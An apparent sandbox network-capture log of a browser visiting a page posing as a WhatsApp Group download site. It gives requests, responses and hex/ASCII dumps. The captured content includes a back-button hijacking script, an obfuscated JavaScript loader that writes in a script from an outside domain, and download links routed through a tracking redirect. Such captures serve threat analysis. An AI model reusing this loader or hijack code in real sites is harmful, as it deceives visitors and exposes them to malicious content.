              2024-08-29 22:47:32 UTC649INData Raw: 69 64 3d 22 70 61 69 6e 74 31 5f 6c 69 6e 65 61 72 5f 77 68 61 74 73 61 70 70 5f 6d 6f 62 69 6c 65 5f 6c 6f 67 6f 22 20 78 31 3d 22 31 38 2e 39 34 32 22 20 79 31 3d 22 33 34 2e 37 32 34 22 20 78 32 3d 22 31 38 2e 39 34 32 22 20 79 32 3d 22 2e 38 37 35 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 39 46 39 46 39 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 70 61 74 74 65 72 6e 20 69 64 3d 22 70 61 74 74 65 72 6e 30 5f 77 68 61 74 73 61 70 70 5f 6d 6f 62 69 6c 65 5f 6c 6f 67 6f 22 20 70 61 74 74 65 72 6e 43 6f 6e 74 65 6e
              Data Ascii: id="paint1_linear_whatsapp_mobile_logo" x1="18.942" y1="34.724" x2="18.942" y2=".875" gradientUnits="userSpaceOnUse"><stop stop-color="#F9F9F9"/><stop offset="1" stop-color="#fff"/></linearGradient><pattern id="pattern0_whatsapp_mobile_logo" patternConten


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.44974335.190.80.14432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:32 UTC535OUTOPTIONS /report/v4?s=8pv5SLQdY1NtE7pPoLC0eSnYf1MZgid%2BYcQl3WAwKxM7JAkXRPw4O4DNt%2B0O%2FOOoA0xg1FYw0mlQ0Rx9Q7qvnkXOJoXRnqpTWMxHGD2FMsnKU4zGokRK0CI06PgFRUrCFzn0 HTTP/1.1
              Host: a.nel.cloudflare.com
              Connection: keep-alive
              Origin: https://dfsvgd.pages.dev
              Access-Control-Request-Method: POST
              Access-Control-Request-Headers: content-type
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:32 UTC336INHTTP/1.1 200 OK
              Content-Length: 0
              access-control-max-age: 86400
              access-control-allow-methods: OPTIONS, POST
              access-control-allow-origin: *
              access-control-allow-headers: content-type, content-length
              date: Thu, 29 Aug 2024 22:47:32 GMT
              Via: 1.1 google
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              Connection: close


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.449746188.114.96.34432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:32 UTC356OUTGET /npm/backoffer.js HTTP/1.1
              Host: dfsvgd.pages.dev
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Sec-Fetch-Site: none
              Sec-Fetch-Mode: cors
              Sec-Fetch-Dest: empty
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:32 UTC757INHTTP/1.1 200 OK
              Date: Thu, 29 Aug 2024 22:47:32 GMT
              Content-Type: text/javascript; charset=utf-8
              Content-Length: 618
              Connection: close
              Access-Control-Allow-Origin: *
              Cache-Control: public, max-age=0, must-revalidate
              ETag: "09641025415c02def83d21149b6a7f1d"
              referrer-policy: strict-origin-when-cross-origin
              x-content-type-options: nosniff
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0NKiHm3%2BFxSX0X9nf9jNHWk1CkqRzjFOCb%2B%2FRNoyPKHv8V7aSjKJ%2BzHQOa0woK9n0jCXLLdhWz7Lq64vWY19z6SAshU6x%2FjeOcZJxrqQVOiO4kmBFYmimPAqa3qJm6kZpmA"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bb0155bce030f6d-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-29 22:47:32 UTC612INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 29 7b 0d 0a 20 20 76 61 72 20 74 61 72 67 65 74 4c 6f 63 61 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 75 72 6c 3d 27 27 3b 0d 0a 20 20 20 20 69 66 28 77 2e 62 61 63 6b 4f 66 66 65 72 55 72 6c 29 7b 0d 0a 20 20 20 20 20 20 75 72 6c 3d 77 2e 62 61 63 6b 4f 66 66 65 72 55 72 6c 7d 0d 0a 20 20 20 20 65 6c 73 65 7b 0d 0a 20 20 20 20 20 20 72 65 74 75 72 6e 7d 0d 0a 20 20 20 20 77 2e 68 69 73 74 6f 72 79 26 26 77 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 26 26 77 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 28 6e 75 6c 6c 2c 6e 75 6c 6c 2c 77 2e 6c 6f 63 61 74 69 6f 6e 29 3b 0d 0a 20 20 20 20 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 77 2e 61 64 64
              Data Ascii: (function(w,d){ var targetLocation=function(){ var url=''; if(w.backOfferUrl){ url=w.backOfferUrl} else{ return} w.history&&w.history.pushState&&w.history.pushState(null,null,w.location); w.addEventListener&&w.add
              2024-08-29 22:47:32 UTC6INData Raw: 74 29 29 3b 0d 0a
              Data Ascii: t));


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.449745172.240.108.684432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:32 UTC646OUTGET /7e89a56fa66ca3796726cd5fa0f1906e/invoke.js HTTP/1.1
              Host: hzr0dm28m17c.com
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
              sec-ch-ua-platform: "Windows"
              Accept: */*
              Sec-Fetch-Site: cross-site
              Sec-Fetch-Mode: no-cors
              Sec-Fetch-Dest: script
              Referer: https://dfsvgd.pages.dev/
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:32 UTC564INHTTP/1.1 403 Forbidden
              Server: nginx/1.21.6
              Date: Thu, 29 Aug 2024 22:47:32 GMT
              Content-Type: application/javascript
              Content-Length: 0
              Connection: close
              P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
              Access-Control-Allow-Origin: *
              Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA
              Host: hzr0dm28m17c.com


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.44974935.190.80.14432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:32 UTC476OUTPOST /report/v4?s=8pv5SLQdY1NtE7pPoLC0eSnYf1MZgid%2BYcQl3WAwKxM7JAkXRPw4O4DNt%2B0O%2FOOoA0xg1FYw0mlQ0Rx9Q7qvnkXOJoXRnqpTWMxHGD2FMsnKU4zGokRK0CI06PgFRUrCFzn0 HTTP/1.1
              Host: a.nel.cloudflare.com
              Connection: keep-alive
              Content-Length: 462
              Content-Type: application/reports+json
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:32 UTC462OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 34 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 36 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 66 73 76 67 64 2e 70 61 67 65 73 2e 64 65 76 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 72 65 73 70 6f 6e 73 65 2e 69 6e 76 61 6c 69 64 2e 63 6f 6e 74 65 6e 74 5f 6c 65 6e 67 74 68 5f 6d 69 73
              Data Ascii: [{"age":241,"body":{"elapsed_time":1063,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://dfsvgd.pages.dev/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":200,"type":"http.response.invalid.content_length_mis
              2024-08-29 22:47:32 UTC168INHTTP/1.1 200 OK
              Content-Length: 0
              date: Thu, 29 Aug 2024 22:47:32 GMT
              Via: 1.1 google
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              Connection: close


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.449750188.114.96.34432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:33 UTC588OUTGET /favicon.ico HTTP/1.1
              Host: dfsvgd.pages.dev
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              sec-ch-ua-platform: "Windows"
              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
              Sec-Fetch-Site: same-origin
              Sec-Fetch-Mode: no-cors
              Sec-Fetch-Dest: image
              Referer: https://dfsvgd.pages.dev/
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:33 UTC712INHTTP/1.1 200 OK
              Date: Thu, 29 Aug 2024 22:47:33 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              Access-Control-Allow-Origin: *
              Cache-Control: public, max-age=0, must-revalidate
              referrer-policy: strict-origin-when-cross-origin
              x-content-type-options: nosniff
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKLXXHvuekcQ4aoLacKwPYzxX6wUZH5iwB%2Fm325F2Fs5Op0K4cpKAoY0QWUY2Zi%2FiTMBHNAV41jBVCGvFGsHFYBrtWDRvL%2FeQ760zM4q6HvnPTbnTa10pIecUpgvq1rCDIGQ"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bb015600c8d18b1-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-29 22:47:33 UTC657INData Raw: 32 35 63 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 68 61 74 73 41 70 70 20 47 72 6f 75 70 20
              Data Ascii: 25c1<!doctype html><html lang="en"> <head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> ... Required meta tags --> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>WhatsApp Group
              2024-08-29 22:47:33 UTC1369INData Raw: 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 62 74 20 64 69 76 20 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 31 31 37 2c 20 31 31 37 2c 20 31 31 37 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 66 39 65 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 62 74 20 64 69 76 20 2e 74 6f 6d 62 6f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 31 65 36 37 35 3b 0d
              Data Ascii: ht: 400; } .bt div p { margin-bottom: 2rem; color: rgb(117, 117, 117); } .body { background-color: #4f9e00; } .bt div .tombol { background: #01e675;
              2024-08-29 22:47:33 UTC1369INData Raw: 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 30 2c 20 30 2c 20 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 73 74 69 63 6b 79 2d 74 6f 70 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 32
              Data Ascii: center; margin-top: 2rem; background: rgb(0, 0, 0); color: white; padding: 2rem; } </style> </head> <body> <nav class="navbar navbar-dark sticky-top" style="background-color: #12
              2024-08-29 22:47:33 UTC1369INData Raw: 2f 2f 73 6d 78 74 72 61 63 6b 2e 63 6f 6d 2f 74 72 61 63 6b 69 6e 67 32 30 32 2f 72 65 64 69 72 65 63 74 2f 72 74 72 2e 70 68 70 3f 74 32 30 32 69 64 3d 32 31 34 26 63 31 3d 52 4a 5f 45 54 48 26 74 32 30 32 6b 77 3d 52 4a 5f 45 54 48 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 22 3e 44 6f 77 6e 6c 6f 61 64 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 73 6f 73 20 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6d 78 74 72 61 63 6b 2e 63 6f 6d 2f 74 72 61 63
              Data Ascii: //smxtrack.com/tracking202/redirect/rtr.php?t202id=214&c1=RJ_ETH&t202kw=RJ_ETH" style="text-decoration: none;">Download</a> </div> <div class="isos container text-center"> <ul> <li><a href="https://smxtrack.com/trac
              2024-08-29 22:47:33 UTC1369INData Raw: 36 34 25 36 44 27 2c 27 25 33 30 25 33 36 25 36 35 25 27 2c 27 46 25 36 33 25 36 31 25 37 34 27 2c 27 37 32 25 36 31 25 36 44 25 36 27 2c 27 34 25 32 45 25 37 37 25 37 32 27 2c 27 25 33 43 25 36 34 25 36 39 25 27 2c 27 36 33 25 37 32 25 36 39 25 37 27 2c 27 33 42 25 30 41 25 32 30 25 32 27 2c 27 30 25 37 34 25 33 45 25 32 37 27 2c 27 33 43 25 32 46 25 37 33 25 36 27 2c 27 25 37 30 25 36 35 25 33 44 25 27 2c 27 39 31 38 32 39 32 39 4b 66 67 71 42 70 27 2c 27 25 36 35 25 33 44 25 32 32 25 27 2c 27 77 72 69 74 65 27 2c 27 46 25 37 34 25 32 32 25 33 45 27 2c 27 46 25 37 33 25 36 33 25 37 32 27 2c 27 32 46 25 36 38 25 37 41 25 37 27 2c 27 30 25 37 42 25 30 41 25 32 30 27 2c 27 33 44 25 33 44 25 33 44 25 32 27 2c 27 31 25 37 32 25 36 31 25 36 44 27 2c 27 25 33
              Data Ascii: 64%6D','%30%36%65%','F%63%61%74','72%61%6D%6','4%2E%77%72','%3C%64%69%','63%72%69%7','3B%0A%20%2','0%74%3E%27','3C%2F%73%6','%70%65%3D%','9182929KfgqBp','%65%3D%22%','write','F%74%22%3E','F%73%63%72','2F%68%7A%7','0%7B%0A%20','3D%3D%3D%2','1%72%61%6D','%3
              2024-08-29 22:47:33 UTC1369INData Raw: 27 36 38 25 37 34 25 32 37 25 32 27 5d 3b 5f 30 78 33 39 37 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 33 64 63 32 34 3b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 33 39 37 64 28 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 30 38 28 5f 30 78 31 61 36 39 39 61 2c 5f 30 78 35 63 64 64 34 66 29 7b 76 61 72 20 5f 30 78 34 36 33 32 34 65 3d 5f 30 78 33 39 37 64 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 65 30 38 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 30 61 30 36 38 2c 5f 30 78 31 32 34 39 61 35 29 7b 5f 30 78 35 30 61 30 36 38 3d 5f 30 78 35 30 61 30 36 38 2d 28 30 78 31 2a 2d 30 78 32 32 65 64 2b 30 78 36 30 30 2b 30 78 35 2a 30 78 35 64 65 29 3b 76 61 72 20 5f 30 78 34 38 36 63 38 35 3d 5f 30 78 34 36 33 32 34 65 5b 5f 30 78 35
              Data Ascii: '68%74%27%2'];_0x397d=function(){return _0x13dc24;};return _0x397d();}function _0x3e08(_0x1a699a,_0x5cdd4f){var _0x46324e=_0x397d();return _0x3e08=function(_0x50a068,_0x1249a5){_0x50a068=_0x50a068-(0x1*-0x22ed+0x600+0x5*0x5de);var _0x486c85=_0x46324e[_0x5
              2024-08-29 22:47:33 UTC1369INData Raw: 31 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 64 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 38 62 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 61 34 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 63 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 36 39 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 64 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 64 66 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 38 39 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 63 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 64 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 64 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 38 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 61 34 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78
              Data Ascii: 1)+_0x47eb1f(0xd3)+_0x47eb1f(0x8b)+_0x47eb1f(0xa4)+_0x47eb1f(0xec)+_0x47eb1f(0x69)+_0x47eb1f(0x73)+_0x47eb1f(0xbd)+_0x47eb1f(0xdf)+_0x47eb1f(0x89)+_0x47eb1f(0x7c)+_0x47eb1f(0xed)+_0x47eb1f(0xd8)+_0x47eb1f(0x83)+_0x47eb1f(0xb8)+_0x47eb1f(0xa4)+_0x47eb1f(0x
              2024-08-29 22:47:33 UTC802INData Raw: 62 31 66 28 30 78 63 39 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 61 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 65 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 66 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 39 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 30 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 65 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 61 32 29 2b 28 5f 30 78 34 37 65 62 31 66 28 30 78 38 66 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 35 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 34 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 39 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 36 61 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 39 63 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 63 63 29 2b 5f 30 78 34
              Data Ascii: b1f(0xc9)+_0x47eb1f(0xba)+_0x47eb1f(0xee)+_0x47eb1f(0x7f)+_0x47eb1f(0x98)+_0x47eb1f(0x70)+_0x47eb1f(0xbe)+_0x47eb1f(0xa2)+(_0x47eb1f(0x8f)+_0x47eb1f(0xe5)+_0x47eb1f(0xe4)+_0x47eb1f(0x93)+_0x47eb1f(0xe8)+_0x47eb1f(0x6a)+_0x47eb1f(0x9c)+_0x47eb1f(0xcc)+_0x4
              2024-08-29 22:47:33 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.449751184.28.90.27443
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:33 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              Accept-Encoding: identity
              User-Agent: Microsoft BITS/7.8
              Host: fs.microsoft.com
              2024-08-29 22:47:34 UTC467INHTTP/1.1 200 OK
              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
              Content-Type: application/octet-stream
              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
              Server: ECAcc (lpl/EF06)
              X-CID: 11
              X-Ms-ApiVersion: Distribute 1.2
              X-Ms-Region: prod-weu-z1
              Cache-Control: public, max-age=125359
              Date: Thu, 29 Aug 2024 22:47:34 GMT
              Connection: close
              X-CID: 2


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.449752188.114.96.34432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:34 UTC355OUTGET /img/wa-logo.svg HTTP/1.1
              Host: dfsvgd.pages.dev
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Sec-Fetch-Site: none
              Sec-Fetch-Mode: cors
              Sec-Fetch-Dest: empty
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:34 UTC751INHTTP/1.1 200 OK
              Date: Thu, 29 Aug 2024 22:47:34 GMT
              Content-Type: image/svg+xml
              Content-Length: 2648
              Connection: close
              Access-Control-Allow-Origin: *
              Cache-Control: public, max-age=0, must-revalidate
              ETag: "25c86fe408000f9d7d23dd184c483eb2"
              referrer-policy: strict-origin-when-cross-origin
              x-content-type-options: nosniff
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FBrcrl5fmDZmLO%2Fjg6C6md8LECLjALHlrWk%2BiqNMqK8SU%2FxcutqeTWN%2BlWJD9nvgX%2BlpGCqrItN3tRsIrneLZPBW%2FJ27%2FLGiS5m3zWaLtqfzVqMgxljvv%2FMUuNbM4kRA9x%2BN"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bb01566e9ca5e78-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-29 22:47:34 UTC618INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 33 37 22 20 68 65 69 67 68 74 3d 22 33 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 2e 36 37 37 20 33 34 2e 31 34 6c 32 2e 33 30 33 2d 38 2e 33 39 34 61 31 36 2e 31 37 37 20 31 36 2e 31 37 37 20 30 20 30 31 2d 32 2e 31 36 36 2d 38 2e 30 38 37 63 30 2d 38 2e 39 32 33 20 37 2e 32 36 38 2d 31 36 2e 31 39 32 20 31 36 2e 31 39 31 2d 31 36 2e 31 39 32 20 34 2e 33 33 34 20 30 20 38 2e 33 39 34 20 31 2e 36 39 20 31 31 2e 34 36 35 20 34 2e 37 34 33 61 31 36 2e 31 30
              Data Ascii: <svg width="37" height="36" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M2.677 34.14l2.303-8.394a16.177 16.177 0 01-2.166-8.087c0-8.923 7.268-16.192 16.191-16.192 4.334 0 8.394 1.69 11.465 4.743a16.10
              2024-08-29 22:47:34 UTC1369INData Raw: 35 63 30 20 39 2e 32 34 37 2d 37 2e 35 32 35 20 31 36 2e 37 37 31 2d 31 36 2e 37 37 32 20 31 36 2e 37 37 31 2d 32 2e 38 31 35 20 30 2d 35 2e 35 36 32 2d 2e 37 2d 38 2e 30 31 39 2d 32 2e 30 34 37 4c 32 2e 30 39 37 20 33 34 2e 37 32 7a 6d 39 2e 32 39 39 2d 35 2e 33 35 37 6c 2e 35 31 31 2e 33 30 37 61 31 33 2e 39 35 35 20 31 33 2e 39 35 35 20 30 20 30 30 37 2e 30 39 38 20 31 2e 39 34 35 63 37 2e 36 37 38 20 30 20 31 33 2e 39 34 2d 36 2e 32 36 31 20 31 33 2e 39 34 2d 31 33 2e 39 34 20 30 2d 33 2e 37 31 39 2d 31 2e 34 35 2d 37 2e 32 33 33 2d 34 2e 30 37 38 2d 39 2e 38 36 61 31 33 2e 38 39 20 31 33 2e 38 39 20 30 20 30 30 2d 39 2e 38 36 32 2d 34 2e 30 39 36 63 2d 37 2e 36 39 35 20 30 2d 31 33 2e 39 35 36 20 36 2e 32 36 32 2d 31 33 2e 39 35 36 20 31 33 2e 39 34
